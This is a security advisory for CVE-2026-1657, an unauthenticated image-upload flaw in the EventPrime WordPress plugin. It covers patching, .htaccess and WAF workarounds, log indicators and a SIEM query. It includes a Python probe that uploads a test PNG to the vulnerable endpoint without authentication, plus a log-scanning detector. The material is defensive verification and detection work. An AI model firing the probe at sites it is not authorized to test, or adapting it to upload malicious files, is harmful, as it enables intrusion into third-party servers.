CVE-2026-1657

5.3 MEDIUM

📋 TL;DR

The EventPrime WordPress plugin allows unauthenticated attackers to upload image files to the WordPress uploads directory and create Media Library attachments via a publicly accessible AJAX endpoint. This affects all WordPress sites using EventPrime plugin versions up to 4.2.8.4.

💻 Affected Systems

Products:
  • EventPrime WordPress Plugin
Versions: All versions up to and including 4.2.8.4
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: All WordPress installations with the vulnerable plugin version are affected regardless of configuration.


⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could upload malicious files disguised as images; if the image check can be bypassed and the web server executes scripts from the uploads directory, this becomes remote code execution. Even without execution, the uploads can host phishing pages or payloads under a trusted domain.

🟠

Likely Case

Attackers upload malicious images or use the uploads directory for hosting phishing content, defacement, or malware distribution.

🟢

If Mitigated

Unauthorized file uploads are blocked, preventing any malicious content from being hosted on the server.

🌐 Internet-Facing: HIGH
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only HTTP POST requests to the vulnerable endpoint without authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.2.8.5 or later

Vendor Reference (vulnerable AJAX handler in the plugin source): https://plugins.trac.wordpress.org/browser/eventprime-event-calendar-management/trunk/includes/class-ep-ajax.php#L1659

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the EventPrime plugin and click 'Update Now'.
4. Verify the plugin version is 4.2.8.5 or higher.

🔧 Temporary Workarounds

Disable vulnerable AJAX endpoint via .htaccess

linux

Blocks the ep_upload_file_media action at the web server level. Note that mod_rewrite can only see the query string: admin-ajax.php also accepts the action parameter in the POST body, which this rule cannot inspect, so treat it as a partial stopgap and prefer deactivating the plugin or a body-inspecting WAF rule.

RewriteEngine On
RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php$
RewriteCond %{QUERY_STRING} (^|&)action=ep_upload_file_media(&|$) [NC]
RewriteRule ^ - [F,L]

Temporarily disable EventPrime plugin

all

Completely removes the vulnerable functionality

wp plugin deactivate eventprime-event-calendar-management

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules that block requests to /wp-admin/admin-ajax.php whose action parameter is ep_upload_file_media, checking both the query string and the POST body
  • Disable script execution in wp-content/uploads/ (for example, deny serving or executing .php files from that directory) and enforce file type validation at the web server level

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > EventPrime version. If version is 4.2.8.4 or lower, the site is vulnerable.

Check Version:

wp plugin get eventprime-event-calendar-management --field=version

Verify Fix Applied:

After updating, verify the plugin version is 4.2.8.5 or higher and test that unauthenticated POST requests to /wp-admin/admin-ajax.php?action=ep_upload_file_media are rejected.
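The following probe, added here as an example and not code from the advisory or from EventPrime, sends a harmless 1x1 PNG to admin-ajax.php with no cookies and reports whether the request was accepted. Only the action name and endpoint path come from this page; the multipart field name `file` and the shape of the JSON reply are assumptions, so an `unknown` verdict means the reply did not match those assumptions, not that the site is safe. Run it only against sites you are authorized to test, and if it reports `accepted`, delete the created attachment from the Media Library.

```python
"""Probe for CVE-2026-1657 (unauthenticated ep_upload_file_media upload).
Added example, not EventPrime or WordPress code.  Assumptions: the upload
field is named 'file' and a successful reply is JSON with success=true."""
import base64
import json
import sys
import urllib.error
import urllib.request
import uuid

ACTION = "ep_upload_file_media"

# Canonical 1x1 transparent PNG, embedded so the probe needs no files on disk.
TINY_PNG = base64.b64decode(
    "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="
)


def build_multipart(fields, file_field, filename, data, boundary):
    """Return (content_type, body) for a multipart/form-data POST."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", value]
    lines += [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"',
        "Content-Type: image/png",
        "",
    ]
    head = "\r\n".join(lines).encode() + b"\r\n"
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def classify(status, body):
    """Map an admin-ajax reply to accepted / rejected / unknown.
    WordPress core answers '0' (HTTP 400) when an action has no nopriv handler
    and '-1' on failed nonce checks; both mean the request was refused.
    A 2xx JSON reply with success=true is taken as 'accepted' (assumption)."""
    text = body.decode(errors="replace").strip()
    if status in (401, 403) or text in ("0", "-1"):
        return "rejected"
    if 200 <= status < 300:
        try:
            reply = json.loads(text)
        except ValueError:
            return "unknown"
        if isinstance(reply, dict) and reply.get("success") is True:
            return "accepted"
        if isinstance(reply, dict) and reply.get("success") is False:
            return "rejected"
    return "unknown"


def probe(site, timeout=15.0):
    """POST the PNG with no session cookie and classify the response."""
    boundary = "----probe" + uuid.uuid4().hex
    ctype, body = build_multipart({"action": ACTION}, "file",
                                  "cve-2026-1657-probe.png", TINY_PNG, boundary)
    req = urllib.request.Request(site.rstrip("/") + "/wp-admin/admin-ajax.php",
                                 data=body, method="POST",
                                 headers={"Content-Type": ctype})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read())


if __name__ == "__main__":
    print(probe(sys.argv[1]))
```

Usage: `python3 probe.py https://example.org`. A patched site should answer `rejected`; an `accepted` verdict on a site running 4.2.8.4 or lower confirms the issue.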

📡 Detection & Monitoring

Log Indicators:

  • Multiple POST requests to /wp-admin/admin-ajax.php with action=ep_upload_file_media from a single client, especially with no preceding wp-login.php activity or WordPress session (access logs do not record authentication state, so correlate with login events)
  • New files appearing in wp-content/uploads/ and new Media Library attachments that do not correspond to any logged-in user's activity

Network Indicators:

  • HTTP POST requests to /wp-admin/admin-ajax.php with action=ep_upload_file_media parameter
  • Unusual file upload traffic to WordPress uploads directory

SIEM Query:

source="web_server" AND (url_path="/wp-admin/admin-ajax.php" AND http_method="POST" AND url_query="*action=ep_upload_file_media*")

This query only matches the action when it appears in the query string; requests that carry the action in the POST body are invisible to web server access logs and need a WAF or application-level log to detect.
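The same detection logic run offline over a web server access log, added here as an example and not part of the advisory. The log lines are constructed for the demonstration (documentation IP ranges, a typical "combined" format); the function groups matching POSTs by client IP so a scanner hammering the endpoint stands out from a single stray request.

```python
"""Scan an access log for CVE-2026-1657 exploitation attempts.
Added example, not part of the advisory or of EventPrime.  SAMPLE_LOG is
constructed for the demonstration."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

SAMPLE_LOG = """\
203.0.113.7 - - [14/Mar/2026:10:00:01 +0000] "GET /wp-content/plugins/eventprime-event-calendar-management/readme.txt HTTP/1.1" 200 5120 "-" "python-requests/2.31"
203.0.113.7 - - [14/Mar/2026:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=ep_upload_file_media HTTP/1.1" 200 187 "-" "python-requests/2.31"
203.0.113.7 - - [14/Mar/2026:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=ep_upload_file_media HTTP/1.1" 200 187 "-" "python-requests/2.31"
203.0.113.7 - - [14/Mar/2026:10:00:03 +0000] "POST /wp-admin/admin-ajax.php?action=ep_upload_file_media HTTP/1.1" 200 187 "-" "python-requests/2.31"
198.51.100.4 - - [14/Mar/2026:10:05:00 +0000] "POST /blog/wp-admin/admin-ajax.php?action=ep_upload_file_media HTTP/1.1" 403 199 "-" "curl/8.4.0"
192.0.2.10 - - [14/Mar/2026:10:06:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50 "https://example.org/wp-admin/" "Mozilla/5.0"
192.0.2.10 - - [14/Mar/2026:10:06:30 +0000] "GET /wp-admin/admin-ajax.php?action=ep_upload_file_media HTTP/1.1" 400 1 "-" "Mozilla/5.0"
"""


def is_upload_attempt(method, target):
    """True for a POST to admin-ajax.php whose query string carries the action.
    The action may also travel in the POST body, which access logs never
    record, so a miss here is not proof of absence."""
    if method != "POST":
        return False
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    return "ep_upload_file_media" in parse_qs(url.query).get("action", [])


def scan(lines):
    """Group matching requests by client IP -> list of (timestamp, status)."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_upload_attempt(m["method"], m["target"]):
            hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)


def triage(hits, min_requests=1):
    """Return [(ip, attempts, reached_wordpress)] sorted by attempt count.
    A 2xx only shows the request reached WordPress; admin-ajax also answers
    200 with a JSON error body, so it does not prove the upload succeeded."""
    rows = []
    for ip, events in hits.items():
        if len(events) >= min_requests:
            rows.append((ip, len(events), sum(1 for _, s in events if 200 <= s < 300)))
    return sorted(rows, key=lambda r: (-r[1], r[0]))


if __name__ == "__main__":
    for ip, attempts, reached in triage(scan(SAMPLE_LOG.splitlines())):
        print(f"{ip:16} attempts={attempts} reached_wordpress={reached}")
```

On the sample data the scanner IP 203.0.113.7 shows three attempts that reached WordPress, 198.51.100.4 one attempt stopped with a 403 (a WAF or the .htaccess rule above), and the GET and heartbeat requests are ignored. Feed real logs with `scan(open("access.log"))`.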
